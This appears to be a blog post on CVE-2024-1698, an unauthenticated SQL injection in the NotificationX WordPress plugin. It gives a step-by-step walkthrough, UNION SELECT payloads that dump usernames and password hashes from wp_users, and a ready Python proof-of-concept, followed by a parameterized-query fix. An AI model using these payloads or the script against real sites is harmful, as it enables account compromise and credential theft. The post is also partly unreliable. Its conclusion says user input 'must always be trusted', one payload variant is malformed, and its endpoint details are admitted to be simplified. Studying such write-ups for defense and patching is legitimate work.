CVE CyberSecurity Database News

CVE-2024-1698 - Critical SQL Injection in NotificationX WordPress Plugin — Exploit Analysis and Walkthrough

Poster -

The open-source WordPress plugin NotificationX (up to version 2.8.2) is meant to boost conversions by showing sales popups, review alerts, and other FOMO/notification widgets. However, a serious security hole—CVE-2024-1698—has been uncovered. In all versions up to and including v2.8.2, the plugin is vulnerable to SQL Injection through the 'type' parameter due to irresponsible handling of user inputs.

In this post, you’ll learn what the vulnerability is, how it works (code included), and see proof-of-concept exploitation. This is an original deep-dive for readers who want a practical grasp of this threat.

What is CVE-2024-1698?

- Plugin: NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor

Vulnerability Type: Unaunthenticated SQL Injection via the type parameter

- Threat: An attacker can inject raw SQL, leaking sensitive data (like user passwords), or even fully compromise the database.

References:

- Wordfence Advisory
- WPScan Entry
- Patchstack Blog Post

How the NotificationX SQL Injection Works

We’ll break down where the vulnerability lies, why escaping was insufficient, and show how attackers abuse it.

The Core Problem in Code

NotificationX is intended to take simple input types like 'sales', 'review', etc., via a GET or POST parameter named type, to show the right notification. But there’s no sanitizing or escaping applied to the incoming user-supplied value.

A typical insecure PHP snippet looks like this

// Vulnerable code snippet (simplified)
$type = $_GET['type']; // NO sanitization or validation!

$sql = "SELECT * FROM {$wpdb->prefix}nx_notifications WHERE type = '{$type}'";
$notifications = $wpdb->get_results($sql);

// BAD: the $type parameter is injected directly into the SQL string

If an attacker supplies a malicious type parameter, say

GET /wp-admin/admin-ajax.php?action=notificationx_fetch&type=' UNION SELECT user_login, user_pass, 1, 2 FROM wp_users -- -

They can change the SQL query entirely, exposing user credentials or even executing arbitrary SQL.

Step 1: Find the Target Endpoint

The plugin exposes AJAX endpoints (often at /wp-admin/admin-ajax.php) accessible without login, where type is read from the request.

Step 2: Craft the Payload

Let’s say you want to dump usernames and hashed passwords from the wp_users table.

Malicious Request

POST /wp-admin/admin-ajax.php?action=notificationx_fetch&type=' UNION SELECT user_login, user_pass, 1, 2 FROM wp_users -- -

Or, in URL format

https://target.wordpress.site/wp-admin/admin-ajax.php?action=notificationx_fetch&type='; UNION SELECT user_login, user_pass, 1, 2 FROM wp_users -- -

Step 3: Receive Exfiltrated Data

The SQL result is returned as JSON. The attacker parses the JSON, revealing usernames and password hashes.

Sample Response (abbreviated)

[
  {
    "type": "admin",
    "notification": "$P$BylwrjK...hashedPassword...",
    ...
  }
]

Exploit Proof-of-Concept (PoC) Python Script

import requests

url = "https://target.wordpress.site/wp-admin/admin-ajax.php";
payload = "' UNION SELECT user_login, user_pass, 1, 2 FROM wp_users -- -"
params = {
    "action": "notificationx_fetch",
    "type": payload
}

resp = requests.post(url, data=params)
print(resp.text)

Note: Replace https://target.wordpress.site with the URL of the vulnerable site.

The only real solution is to sanitise and escape user inputs and use parameterized queries

// Safe code example
$type = sanitize_text_field( $_GET['type'] );
$notifications = $wpdb->get_results( 
    $wpdb->prepare("SELECT * FROM {$wpdb->prefix}nx_notifications WHERE type = %s", $type)
);

- WordPress: Sanitize, Escape, and Validate User Data

If you use NotificationX (≤ 2.8.2):
Update to the latest version immediately. If no patch is available, disable the plugin until one is released.

Conclusion

CVE-2024-1698 is a textbook example of why user input must always be trusted. This high-severity bug in NotificationX allows unauthenticated attackers to steal any data they want from a WordPress site’s database. Updating your plugins and keeping up with security advisories is critical for website owners and administrators.

References

- WPScan: CVE-2024-1698
- Wordfence Alert
- Patchstack Vulnerability Database

Timeline

Published on: 02/27/2024 06:15:46 UTC
Last modified on: 02/27/2024 14:20:06 UTC